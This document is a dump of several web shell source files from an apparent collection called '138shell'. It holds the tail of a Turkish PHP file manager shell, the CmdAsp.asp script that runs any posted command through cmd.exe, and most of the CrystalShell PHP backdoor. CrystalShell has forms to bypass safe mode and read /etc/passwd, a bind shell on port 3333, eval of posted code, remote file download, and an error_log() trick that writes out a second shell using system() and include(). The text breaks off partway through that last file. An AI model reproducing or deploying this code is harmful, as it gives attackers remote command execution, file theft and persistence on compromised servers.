mkdir("$klasr", 0777) or die ("<center><font color='#0000FF'>Klasr Olu?turulamyyor</font></center>");
echo "<center><font color='#0000FF'>Klasr Olu?turuldu</font></center>";
}
echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
echo "<center>Klasr Ysmi :<input type='text' name='kismi'></center><br>";
echo "<br>";
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
echo "</form>";
}
if($op=='del'){
unlink("$fname");
}
if($op=='dd'){
$dir=$here;
$deldirs=$yol;
if(!file_exists("$deldirs")) {
echo "<font color=\"#ff0000\">Dosya Yok</font>";
} else {
deltree($deldirs);
}
}
if($op=='edit'){
$yol=$fname;
$yold=$path;
if (isset($ok)){
$dosya = fopen("$yol", 'w') or die("Dosya Aylamyyor");
$metin=$tarea;
fwrite($dosya, $metin) or die("Yazylamyyor!");
fclose($dosya);
echo "<center><font color='#0000FF'Dosya Ba?aryyla Dzenlendi</font></center>";
} else {
$path=$dir;
echo "<center>DZENLE: $yol</center>";
$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Aylamyyor</font></center>");
$boyut=filesize($yol);
$duzen = @fread ($dosya, $boyut);
echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
fclose($dosya);
$duzen=htmlspecialchars($duzen);
echo "</form>";
}
}
if($op=='efp2'){
$fileperm=base_convert($_POST['fileperm'],8,10);
echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 YSYMLY DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEY?TYRYLEMEDY!!</font>";
echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEY?TYRYLDY</font>";
}
if($op=='efp'){
$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
echo "<form method=post action=./$this_file?op=efp2>
<div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
<input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
<input name='dir' type='hidden' value='$yol'>
<input type='submit' value='TAMAM' class='input'></div><br>
</form>";
}
$path=$dir;
if(isset($dir)){
if ($dir = @opendir("$dir")) {
while (($file = readdir($dir)) !== false) {
if($file!="." && $file!=".."){
if(is_file("$path/$file")){
$disk_space=filesize("$path/$file");
$kb=$disk_space/1024;
$total_kb = number_format($kb, 2, '.', '');
$total_kb2="Kb";
echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>dzenle</a> - ";
echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
echo "<br></div>\n";
}else{
echo "<div align=left><a href='./$this_file?dir=$path/$file'>GYT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
echo "<font color='#FFFF00'>$dirperm</font>";
echo " <br></div>\n";
}
}
}
closedir($dir);
}
}
echo "<center>------------------------------</center>";
echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasrne Git</a></center>";
echo "<center><a href='./$this_file?dir=/'>Linux Kk Dizinine Git</a></center>";
if(file_exists("B:\\")){
echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
} else {}
if(file_exists("C:\\")){
echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
} else {}
if (file_exists("D:\\")){
echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
} else {}
if (file_exists("E:\\")){
echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
} else {}
if (file_exists("F:\\")){
echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
} else {}
if (file_exists("G:\\")){
echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
} else {}
if (file_exists("H:\\")){
echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
} else {}
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center><font size='+1' color='#FF0000'><b>SERVER BYLGYLERY</b></font><br></center>";
echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
echo "<br>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center><font size='+1' color='#FF0000'><b>Y?LEMLER</b></font><br></center>";
echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gnder</a></font></center>";
echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Olu?tur</a></font></center>";
echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasr Olu?tur</a></font></center>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<br>
<center>Tm haklary sahibi MafiABoY'a aittir</center>";
?>
================================================
FILE: 138shell/C/CmdAsp.asp.txt
================================================
<++ CmdAsp.asp ++>
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
<-- CmdAsp.asp -->
================================================
FILE: 138shell/C/Crystal.txt
================================================
<?
error_reporting(5);
@ignore_user_abort(true);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
/**********************************************************/
/* CrystalShell v.1
/* --------- ----------
/*
/* Coded by : Super-Crystal and Mohajer22
/* ------------------------------------------------
/* Arab Security Center Team <---thanks
/* mail : sup3r-hackers@hotmail.Com
/* october73 shell & CrystalShell < coding by super crystal
/*
/*********************************************************/
?>
<?$dir=realpath("./")."/";
$dir=str_replace("\\","/",$dir);
?>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title>
Crystal shell</title>
<style type='text/css'> body { background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #1CBr81; } a:hover{text-decoration: underline;
color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}-->
</style>
<![endif]-->
<meta http-equiv=Content-Language content=ar>
<!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
<style>
<!--
body { scrollbar-face-color: #000000; scrollbar-shadow-color: #CC0000; scrollbar-highlight-color: #CC0000; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000; scrollbar-arrow-color: #ffffff }
-->
</style>
<style>
<!--
#leftright, #topdown{
position:absolute;
left:0;
top:0;
width:1px;
height:1px;
layer-background-color:limegreen;
background-color:red;
z-index:100;
font-size:1px;
}
-->
</style>
</head>
</head>
<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
<th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
<p align="center"> </p>
<p align="center">
<a bookmark="minipanel">
<font face="Webdings" size="7" color="#DCE7EF"></font></a><font size="7" face="Martina">CRYSTAL-H</font><span lang="en-us"><font size="3" face="Martina"> </font>
<font size="1" face="Arial">Crystal hack shellphp</font></span><font color="#FFFF00" face="Arial" size="1"> <span lang="en-us">2006-2007</span></font></p>
</p>
<a bookmark="minipanel">
<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
<p align="center">
<b>
<?
$dirfile="$file_to_download";
if (file_exists("$dirfile"))
{
header("location: $dirfile");
}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "<font color=\"red\">ON (secure)</font>";
}
else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
echo("Safe-mode: $hsafemode");
// PHPINFO
if ($_GET['action'] == "phpinfo") {
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() bị cấm";
exit;
}
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
echo("<br>");
echo("Open base dir: $hopenbasedir");
echo("<br>");
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo("<br>");
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo("<br>");
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
echo("<br>");
echo "PHP version: <b>".@phpversion()."</b>";
echo("<br>");
echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
echo("<br>");
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
?>
</b></p>
<p align="center"> </p></td></tr></table>
<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
<b>
</b></p>
<p align="center"> </p></td></tr></table>
</a>
</p>
<p align="center"><font color="#FFFF00"> </font></p>
<p align="center"></p>
</th></tr><tr>
<td bgcolor="#000000" style="color: #DCE7EF">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font size="4px">
<b>
<font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial"> <?php echo php_uname(); ?> </font></span></font></b><p>
<font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial"> </font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?> </font></font>
</font>
</p>
</font>
<font size=1 face=Verdana>
<p><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font>
</b>
</font>
</font>
<a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none">
<font size=-2 face=verdana color="#FFFFFF">
<? passthru("id");?></font><font size=-2 face=verdana color="black"><br>
</font>
</a><span lang="en-us"><font face="Wingdings" size="3" color="#FFFFFF">1</font></span><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF">
<? echo getcwd();?></div></font></font></a></font></b></a></font><br>
<br> <b><font size="4px"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color="#FF0000" face="Verdana" size="-2">
</font></a></font><font size="4px"><font size=-2 face=verdana></a><font face="Verdana" size="-2"> </font></font></font><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="3" face="verdana">Back</font><font color="#DCE7EF" size="1" face="verdana"> </font>
</font></a><font face="Wingdings" size="5" color="#C0C0C0"></font><span lang="en-us"><font size="5" color="#C0C0C0" face="Webdings">
</font></span><font face="verdana" color="white"><font face=Verdana><font face=verdana color=white></font></font></font><font face=Verdana color="white"><a href=?action=phpinfo target=\"_blank\" style="color: white; text-decoration: none"><font color="#CC0000" size="3"><a target="\"_blank\"" style="text-decoration: none" title=" Php" href="?action=phpinfo"><font color="#CC0000">phpinfo</font></a></font></a></font></b><span lang="en-us"><font color="#C0C0C0" face="Wingdings" size="5">2</font></span><b><font size=-2 face=verdana>
</font>
</b><b><font size="4px"><font size="4px" face="verdana" color="white">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font color=#DCE7EF face="Verdana" size="-2"> </font></font></font><font face="verdana" color="white"><span lang="en-us"><a title="" href="?act=tools"><font color=#CC0000 size="3">Tools</font></a></span></font><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Wingdings 2" size="5">4</font></span></a><font size="4px" face="verdana" color="white"></a></font></b><b><font face=Verdana size="4px"><font size=-2 face=verdana>
</font></font></b><b><font size="4px">
<font size="4px" face="verdana" color="white">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us"> </span> </font></font></font>
<font face="verdana" color="white"><span lang="en-us">
<a title="" href="?act=decoder"><font color=#CC0000 size="3">Decoder</font></a></span></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Webdings" size="5">i</font></span></a><font size="3" face="verdana" color="white"></a></font><font size=-2 face=verdana>
</font>
</b><b><font size="4px"><font size="4px" face="verdana" color="white">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us"> </span> </font>
</font></font><span lang="en-us"><font face="verdana" color="white">
<a href="?act=bypass"><font color=#CC0000 size="3">
<a title=" " href="?act=bypass"><font color="#CC0000">ByPass</font></a></font></a></font><font face="Webdings" size="5" color="#C0C0C0">`</font></span><font size="4px" face="verdana" color="white"></a></font><font size=3 face=verdana>
</font>
<font size="4px" face="verdana" color="white">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us"> </span> </font>
</font><font face="verdana" color="white"><span lang="en-us">
<a title=" " href="?act=SQL"><font color=#CC0000 size="3">SQL</font></a></span></font></b><font face="Webdings" size="5" color="#C0C0C0"></font><b><font size="3" face="verdana" color="white"></a></font></b><font size="3"></font></font><b><font face=Verdana size="4px"><font size=-2 face=verdana>
</font></font></b><font size="4px"><b>
<font size="4px" face="verdana" color="white">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us"> </span></font></font></b></font><b><span lang="en-us"><font face="verdana" color="white"><a title="bind shell" href="?act=bindport"><font color=#CC0000 size="3">Bind</font></a></font></span></b><font face="Webdings" size="5" color="#C0C0C0"></font><font size="4px"><b><font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2"> </font>
</font></b></font><b><font face="verdana" color="white">
</b><b>
<a href="?act=help"><span lang="en-us"><font color=#CC0000 size="3">
<a title="" href="?act=help"><font color="#CC0000">help</font></a></font></span></a></b></font><b><a title="" href="?act=help"><font size="4px" face="verdana" color="#CC0000"></a></font></a><font size=3 face=verdana>
</font><span lang="en-us"><font color="#C0C0C0" face="Webdings" size="5">s</font></span><font face="verdana" color="white"><span lang="en-us"><font color=#CC0000 size="3"><a title="" href="?act=about"><font color="#CC0000">about</font></a></font></span></a></font></a><font size=3 face=verdana>
</font></b><span lang="en-us"><font size=5 face=Wingdings color="#C0C0C0">
?</font></span></p>
<p><font size="4px"><font size=-2 face=verdana color=white><font size="4px" face="Verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">
[</font></a></font><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font face="Webdings" color="#DCE7EF">j</font></a><font color=#CC0000 face="Verdana" size="-2"> </font>
<font size="4px">
<font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font size=-2 face=verdana color=#CC0000>server </font>
<font size="1" face="verdana" color="#CC0000">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_NAME; ?>
</font></a></font>
</a></font>
</font><b>
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font color=#DCE7EF size="-2" face="verdana">] </font>
<font size=-2 face=verdana color=white>
<font size="4px" face="verdana" color="white">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font face=Verdana size=-2 color="#008000">
CGI v</font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $GATEWAY_INTERFACE; ?> </font>
<font face=Verdana size=-2 color="#008000"> HTTP v</font></a></font><font size="1" face="verdana">:</font><font size="4px" face="verdana" color="DCE7EF"><font face=Verdana size=-2> <?php echo $SERVER_PROTOCOL; ?></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font face=Verdana size=-2><font size=-2 face=verdana color=#DCE7EF> </font><font size=-2 face=verdana color=#008000>Mail
admin</font></font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADMIN; ?> </font><font face=Verdana size=-2 color="black"> </font></a></font>
</font>
</b>
</font></a> <br>
<font size="4px">
<b>
<font size=-2 face=verdana color=white>
<font face=Verdana size=-2 color="#CC0000">
<a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none">
<font face="Wingdings" size="3" color="#000000">:</font></a></font><font size=-2 face=verdana color=#CC0000> </font><font face="Verdana" size="-2" color="#CC0000">IP</font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px" face="verdana" color="white"><font face=Verdana size=-2>
</font><font size="1" face="verdana"> </font></font><font size="1" face="verdana" color="#CC0000">SERVER:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADDR; ?>
</font>
</a>
<font size="4px">
</a>
<font size=-2 face=verdana color=white>
</font></font>
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font size="4px"><font face=Verdana size=-2 color="black">
</font>
<font size="4px" face="verdana" color="white"><font face=Verdana size=-2 color="#008000">
port
</font><font size="1" face="verdana" color="#000000">:</font><font face=Verdana size=-2 color="red"> <?php echo $SERVER_PORT; ?>
</font></font>
</font>
</font>
</b>
</font></p></td></tr></table>
<?
if ($act == "help") {echo "<center><b> <br><br> <br> <br> </a>.</b>";}
if ($act == "bindport"){
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
<b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\">
<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Connect\"></form></div>";
}
if ($act == "tools"){
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
File to edit:
<input type=\"text\" name=\"editfile\" >
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<INPUT type=\"submit\" value=\"Edit\"></form></div>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
<table id=tb><tr><td>
<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
<INPUT type=\"submit\" value=\"eval code\" id=input></form></div></td></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>Download here <b>from</b>:
<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
<b>-->>:</b>
<INPUT type=\"text\" name=\"fileto\" size=30>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
}
if ($act == "about") {echo "<center><b>Coding by:<br><br>Super-Crystal<br>&<br>Mohajer22<br>-----<br>Thanks <br>TrYaG Team <br> ArabSecurityCenter Team <br>CRYSTAL-H Version:0 Beta phpshell code<br>Saudi Arabic </a>.</b>";}
if ($act == "bind") {echo "<center><b>CRYSTAL-H:<br><br>-Connect .<br>.- <br>.- <br>nc -lp 3333 - <br> <br>Bind port to :<br> bind shell </a>.</b>";}
if ($act == "command") {echo "<center><b>CRYSTAL-H:<br><br> Select ------ x <br>.- <br>Command </a>.</b>";}
if ($act == "team") {echo "<center><b>Arab Security Center Team<br><br>Super-Crystal<br>Medo-HaCKer<br>Anaconda<br>Alsb0r<br> ReeM-HaCK <br>NoOFa <br> AL-Alame<br>The YounG HackeR<br>Anti-Hack<br>Thanks </a>.</b>";}
if (array_key_exists('image', $_GET)) {
header('Content-Type: image/gif');
die(getimage($_GET['image']));
}
if ($act == "bypass") {
echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
<table id=tb><tr><td>Execute:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
";
echo ("<FONT COLOR=\"RED\"> bypass safemode with copy </FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>read file :
<INPUT type=\"text\" name=\"copy\" size=30 value=\"/etc/passwd\">
<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
echo ("<FONT COLOR=\"RED\"> bypass safemode with CuRl</FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>read file :
<INPUT type=\"text\" name=\"curl\" size=30 value=\"/etc/passwd\">
<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
echo ("<FONT COLOR=\"RED\"> bypass safemode with imap()</FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td><select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>
<INPUT type=\"text\" name=\"string\" size=30 value=\"/etc/passwd\">
<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
echo ("<FONT COLOR=\"RED\"> bypass safemode with id()</FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>
<select name=plugin><option>cat /etc/passwd</option></select>
<INPUT type=\"submit\" value=\"Show\" id=input></td></tr></table></form></div>";
echo ("<FONT COLOR=\"RED\"> Exploit: error_log()</FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>
<INPUT type=\"text\" name=\"ERORR\" size=30 value=\"\">
<INPUT type=\"submit\" value=\"Write\" id=input></td></tr></table></form></div>";
}
if ($act == "decoder"){
echo ("<FONT COLOR=\"RED\"> replace Chr()</FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>
<textarea name=\"Mohajer22\" cols=\"50\" rows=\"15\" wrar=\"off\">
</textarea><br>
<INPUT type=\"submit\" value=\"Replace\" id=input></td></tr></table></form></div>";
}
if ($act == "SQL"){
echo ("<FONT COLOR=\"RED\"> MySQL </FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td> Username :
<INPUT type=\"text\" name=\"username\" size=30 value=\"\">\n
password :
<INPUT type=\"password\" name=\"password\" size=30 value=\"\">\n
<input type=submit value='Enter'>\n
<input type=reset value='Clear'></td></tr></table></form></div>";
}
?>
<br>
<TABLE style="BORDER-COLLAPSE: collapse; color:#000000" cellSpacing=0 borderColorDark=#DCE7EF cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#C0C0C0 border=1><tr>
<td width="100%" valign="top" style="color: #00000" bgcolor="#000000">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<TABLE style="BORDER-COLLAPSE: collapse; font-family:Verdana; font-size:11px; color:#000000; background-color:#0000000" height=1 cellSpacing=0 borderColorDark=#000000 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#DCE7EF border=1>
<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
<td width="990" height="1" valign="top" style="border:1px solid #00000; font-family: Verdana; color: #000000; font-size: 11px; "><p align="center">
</p>
<p align="center"> <table style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
<td style="font-size: 13px; font-family: verdana, arial, helvetica; color: red; background-color: #0000000">
<?php
// chr() //
if(empty($_POST['Mohajer22'])){
} else {
$m=$_POST['Mohajer22'];
$m=str_replace(" ","",$m);
$m=str_replace("(","",$m);
$m=str_replace(")","",$m);
$m=str_replace(".",";",$m);
$m=str_replace("chr","&#",$m);
$m=str_replace(" ","",$m);
echo $m ;
}
// ERORR //
if(empty($_POST['ERORR'])){
} else {
$ERORR=$_POST['ERORR'];
echo error_log("
<html>
<head>
<title> Exploit: error_log() By * Super-Crystal * </title>
<body bgcolor=\"#000000\">
<table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
<tr>
<td><center><font size='6' color='#BBB516'> By * Super-Crystal * TrYaG Team</font></center></td>
</tr>
</table>
<font color='#FF0000'>
</head>
<?
if(\$fileup == \"\"){
ECHO \" reade for up \";
}else{
\$path= exec(\"pwd\");
\$path .= \"/\$fileup_name\";
\$CopyFile = copy(\$fileup,\"\$path\");
if(\$CopyFile){
echo \" up ok \";
}else{
echo \" no up \";
}
}
if(empty(\$_POST['m'])){
} else {
\$m=\$_POST['m'];
echo system(\$m);
}
if(empty(\$_POST['cmd'])){
} else {
\$h= \$_POST['cmd'];
print include(\$h) ;
}
?>
<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
<input type='file' name='fileup' size='20'>
<input type='submit' value=' up '>
</form>
<form method='POST' action='Super-Crystal.php'>
<input type='cmd' name='cmd' size='20'>
<input type='submit' value=' open (shill.txt) '>
</form>
<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
<input type='text' name='m' size='20'>
<input type='submit' value=' run '>
